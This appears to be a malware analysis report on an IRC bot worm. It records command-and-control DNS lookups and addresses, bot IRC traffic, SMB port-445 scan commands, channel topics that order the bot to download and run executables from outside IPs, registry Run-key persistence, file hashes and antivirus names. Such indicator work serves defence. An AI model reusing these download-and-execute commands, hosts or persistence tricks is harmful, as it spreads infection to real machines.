– DNS Queries:
Name Query Type Query Result Successful Protocol
java.kutlufamily.com DNS_TYPE_A 178.211.56.105 178.211.56.104
www.pr0.net DNS_TYPE_A 74.206.242.164 YES udp
Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104]
Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105]
Remote Host Port Number
178.211.56.104 81
74.206.242.164 80
NICK [N00_USA_XP_2259315](
PRIVMSG [N00_USA_XP_2259
@ :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Sequential Port Scan started on 192.168.146.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.
MODE #ss -ix
@ :download; Bad URL or DNS Error, error:
USER SP2-529 * 0 :COMPUTERNAME
MODE [N00_USA_XP_2259315](
@ -ix
JOIN #ss
PRIVMSG #xs :HTTP SET http://66.90.103.116/ss.exe
Nick: [N00_AUT_XP_2778236](xea@
Username: SP3-860
Joined Channel: #ss with Password ^B^B^B^B
Channel Topic for Channel #ss: “.asc -S -s |.http http://66.90.103.116/ss.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://66.90.103.116/c1111.jpg c:d5b2y1g8u2s6.exe c:d5b2y1g8u2s6.exe -r -h”
Private Message to Channel #xs: “HTTP SET http://66.90.103.116/ss.exe”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “scan; Random Port Scan started on 80.13.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “scan; Sequential Port Scan started on 80.13.75.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “download; File download: 116.0KB to: c:d5b2y1g8u2s6.exe @ 38.7KB/sec.”
Private Message to User [N00_AUT_XP_2778xc0xbc@: “download; Created process: “c:d5b2y1g8u2s6.exe”, PID: “
178.211.56.105:81
Nick: [N00_AUT_XP_6439336](xea@
Username: SP3-315
Joined Channel: #tt with Password ^B^B^B^B
Channel Topic for Channel #tt: “.asc -S -s |.http http://66.90.103.116/tt.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://66.90.103.116/dol2.jpg c:i6y6n6r1j1k2.exe c:i6y6n6r1j1k2.exe -r -h”
Private Message to Channel #xs: “HTTP SET http://66.90.103.116/tt.exe”
Private Message to User [N00_AUT_XP_6439xc0xbc@: “scan; Sequential Port Scan started on 192.35.222.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.”
* The following ports were open in the system:
Port Protocol Process
1052 TCP ssqrm.exe (%System%ssqrm.exe)
1467 TCP ssqrm.exe (%System%ssqrm.exe)
1473 TCP ssqrm.exe (%System%ssqrm.exe)
Registry Modifications
* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%System%ssqrm.exe”
so that ssqrm.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%System%ssqrm.exe”
so that ssqrm.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
ssqrm.exe %System%ssqrm.exe 339,968 bytes
File System Modifications
* The following files were created in the system:
# Filename(s) File Size File Hash Alias
1 %Windir%logfile32.txt 0 bytes MD5: 0xD41D8CD98F00B204E9800998ECF8427E
SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709 (not available)
2 [file and pathname of the sample #1]
%System%ssqrm.exe 143,360 bytes MD5: 0x7EE827862F1C5A60516129F33C9878A8
SHA-1: 0xA52118D6379A2B2FA68627874334022498DC38AF Packed.Generic.307 [Symantec]
Net-Worm.Win32.Kolab.nba [Kaspersky Lab]
Generic.dx!uvc [McAfee]
Trojan:Win32/Ircbrute [Microsoft]
Virus.Win32.VBInject [Ikarus]
UPDATE:
NICK [N00_USA_XP_6297640]P
PRIVMSG [N00_USA_XP_6297
@ :update; File download: 94.5KB to: C:DOCUME~1UserNameLOCALS~1Temperaseme_71721.exe @ 47.3KB/sec.
QUIT gettin new bin .
NICK [00_USA_XP_7132739]
USER SP2-823 * 0 :COMPUTERNAME
MODE [00_USA_XP_7132739] -ix
JOIN #e1
USER SP2-331 * 0 :COMPUTERNAME
PRIVMSG #xs :HTTP SET http://178.211.56.90/e1.exe
PRIVMSG #e1 :scan; Sequential Port Scan started on 192.168.80.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.
MODE [N00_USA_XP_6297640]P
A -ix
PRIVMSG #e1 :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
PRIVMSG #e1 :scan; Random Port Scan started on 174.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
MODE #e1 -ix
JOIN #d1
MODE #d1 -ix
infos about the hoster:
http://whois.domaintools.com/178.211.56.104